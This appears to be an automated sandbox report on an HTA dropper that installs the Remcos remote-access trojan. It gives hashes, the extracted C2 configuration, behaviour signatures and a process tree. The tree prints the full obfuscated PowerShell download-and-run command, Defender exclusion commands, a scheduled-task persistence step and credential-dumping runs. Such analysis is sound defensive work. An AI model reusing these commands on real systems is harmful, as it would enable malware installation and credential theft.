Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
-
submitted
25-09-2024 07:04
General
-
Target
9f71dfb4c82b046b86940ff82f86cadf.hta
-
Size
115KB
-
MD5
9f71dfb4c82b046b86940ff82f86cadf
-
SHA1
6bcd13d4f0e0ebf49b1107cd120368230effd547
-
SHA256
3dab14859030e20708a39df701feb49b3b33097a3b1178d1801be40746c43232
-
SHA512
bd64fe93e298261840995ba2a1f46418ffcc87875682d1ee921063c0e3911ad407efd086c96a7ee4643a673b6b678aab2aa89d8d90ec76d4ae7b21cd3a2686ba
-
SSDEEP
48:7oa+apd7Ah23jBZ9mqYZ9NqZ4v0te2RVC1c8oawopyZAqXl9RXGbZ9nZ9GZkBUyN:Ea+M77929kRVTTwcnlXu9Z9K9s8AT
Malware Config
Extracted
remcos
RemoteHost
hiddenrmcnew.duckdns.org:7839
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-PW8G0U
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
-
Executes dropped EXE 5 IoCs
-
Loads dropped DLL 5 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 60 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9f71dfb4c82b046b86940ff82f86cadf.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C pOWERSHelL -ex ByPass -nOP -W 1 -c DeviCeCREdENtiALdeplOymeNT ; IEx($(iex('[SYsteM.TEXt.eNCOdiNg]'+[Char]58+[char]0x3a+'utf8.GETStrIng([SySteM.COnVErt]'+[chAR]58+[chaR]58+'fROMbAsE64strINg('+[Char]0X22+'JG5UYWdMdzIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVSZEVmSU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG11byxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuTWtYQlBGcCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFV6SFJWSURUR3UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQnhNUXB2KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQkpaSiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZXNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkblRhZ0x3Mjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMTEzLjI1Mi8xNzEvYXVkaW9kZy5leGUiLCIkZW52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7c3RhcnQtc2xlRXAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[ChAR]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWERSHelL -ex ByPass -nOP -W 1 -c DeviCeCREdENtiALdeplOymeNT ; IEx($(iex('[SYsteM.TEXt.eNCOdiNg]'+[Char]58+[char]0x3a+'utf8.GETStrIng([SySteM.COnVErt]'+[chAR]58+[chaR]58+'fROMbAsE64strINg('+[Char]0X22+'JG5UYWdMdzIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVSZEVmSU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG11byxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuTWtYQlBGcCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFV6SFJWSURUR3UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQnhNUXB2KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQkpaSiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZXNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkblRhZ0x3Mjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMTEzLjI1Mi8xNzEvYXVkaW9kZy5leGUiLCIkZW52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7c3RhcnQtc2xlRXAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[ChAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ykhbu-6w.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC2F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBC2E.tmp"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\audiodg.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wUtVQHiucCbXP.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wUtVQHiucCbXP" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB56.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\audiodg.exeC:\Users\Admin\AppData\Roaming\audiodg.exe /stext "C:\Users\Admin\AppData\Local\Temp\bjdopamulmelrd"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exeC:\Users\Admin\AppData\Roaming\audiodg.exe /stext "C:\Users\Admin\AppData\Local\Temp\llihptxozuwqtkulhj"6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exeC:\Users\Admin\AppData\Roaming\audiodg.exe /stext "C:\Users\Admin\AppData\Local\Temp\wfozqliqndovdqipqttze"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5725adcb923f418bd6cdf4ba3ec7fa757
SHA1cb293a50db4ea01656d151fdb6316cd386014c1b
SHA2560ee306b4fca8d905720c3b10d1c0bbfe5b4e3c9668a996db5e35867672cd198a
SHA5123652280fd1380e263d94eaa21063f83484092664ca282d853f26424187cbffb1d6b6c52c9c5ae8b47587475c860d51333d50646bc36603a5a294f0a9a6d05cd9
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
1KB
MD58514f8d856c25d38dab2aa5f83c91ba0
SHA13ff4991ed9315b4687d2e2991d3580b73f23dbdb
SHA2560b863c725a5dd7e8a47c77930b8f0aacd2746546d034f518c4152ab88a133995
SHA512eb1a16b58ce17ac011c0634cddd340b3eeefa3337393e3fc5d0a1f7e34923ff6adf9cc783e1718e29f6140bd1e4900fb5e564d42be30fa794403f9cf7bc08f63
-
Filesize
3KB
MD5f970695e3999e0024a5856179cdac359
SHA1ed44cc591d2e8a5b1354338e66d9b10635654513
SHA256d9d4c332e4ab22d86d70bb3d1587a1c13bd327111c84822df717ba0e20e7eb1c
SHA51204a9648d4cec8f55ffb915e0d5ff2103d2a3395ce2d81dc0d1ba65659c197b6e4fff60e8ead614e26eb036e7f6223f18b17ce44a05402b0c019190d177027e70
-
Filesize
7KB
MD511e4366e7285d1e1d57d6c30fbe86bd7
SHA11ebe3b0f3f474227542f92d47ea8f16c809d2923
SHA256b3474e21f75d4fd9dd7160d31131bbf3524aca1524fdbdf0acba2d974641b217
SHA51222f2eef0470da1ae1915612dc6bed52e273c0218f6b9b49980f2538072b17269a232a427ce1863664b91eeffdbb2ee41fcd026fbad8cec68473ba1de8add050a
-
Filesize
7KB
MD52e10df416dec577824565f00657d94c7
SHA1114d3e3cc29ce9d291c627ce2f6433ffe1690ab2
SHA2562233f1171b25adaaac30dce20dee30c3f0808cee7898cf9412ef30cce54bbf5e
SHA5120febcb9db31e05070b061d6e434754daaa74bc7630ceab4644dba6f85de98aa7742d3725004765263f1e4eb2ffcd6bdd85fb626238495d8e65662e3e05d6d53e
-
Filesize
1.1MB
MD5311148c65ef0cadb803bccc2cf922fee
SHA1d70c32206a52470e3b622984e7fb6ab7668c5919
SHA256ff67f46cb0b8c93cc038c969376a92b04ab3809b0efd52f99bdfbbd9a991cc87
SHA5128a998d9e89a53b65ef1d5a996f5540d0c0ba7f964af274ef5991dac3c4fd6c3eb4b89f5bc54449b797ffede1f57bd8d4604f4df3cd46fadb6dc94391713208cc
-
Filesize
652B
MD5f88424737bd71a0cf950aa90d89cec02
SHA1e4f07570de32e76e3615ae23f224d8e37516b7d8
SHA2569bf8376e3d6e77b7b1746d1facdb3a8feef7bed9f58734579a37e9b5fbaf20f5
SHA512f8d022b2cdb35d979a39390576b14b692b35e2da4d542bbdff562e78851bc30e33680b8c231ee1dc269bc4e3830e4692f74ee19f0f3f967ae90ee96f2d8e76f9
-
Filesize
473B
MD53bb844530f01f0263d147fc639cdaa17
SHA172a54c9e60fa65951724c7785e23472b5434bb6d
SHA256b7a4df6b846ba78b9234d149ebddc645595ea3ed7de89e667ac1d070d5c20231
SHA512b05fcd2cd4788d9887d93e4ba41f94c1620f74b30c550a08c09230525d82cc65aff6fdc6ff5887574f3b3fbe3e4ae06b188a7110f70c22d683d8cca22492084d
-
Filesize
309B
MD5bb13131a3d655cfc3b8ec5b498a19941
SHA1376c7cecf5064a5fccd252ce1d4403275e96e648
SHA256f2346b1bec5669e51ae62a67f06ce27fcee103bfb214d141eb525577889be84c
SHA512c9e7c3113d37cb35517e7c261b5549dfe48f61a82c5e44a6ccce712e23fc15af71085d97c1bc2c5f0d5e4b829010be23263a2dcff365a4f6be170ed5137a9850
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
4KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
100KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
4KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
768KB
-
Filesize
1.1MB
-
Filesize
72KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
4KB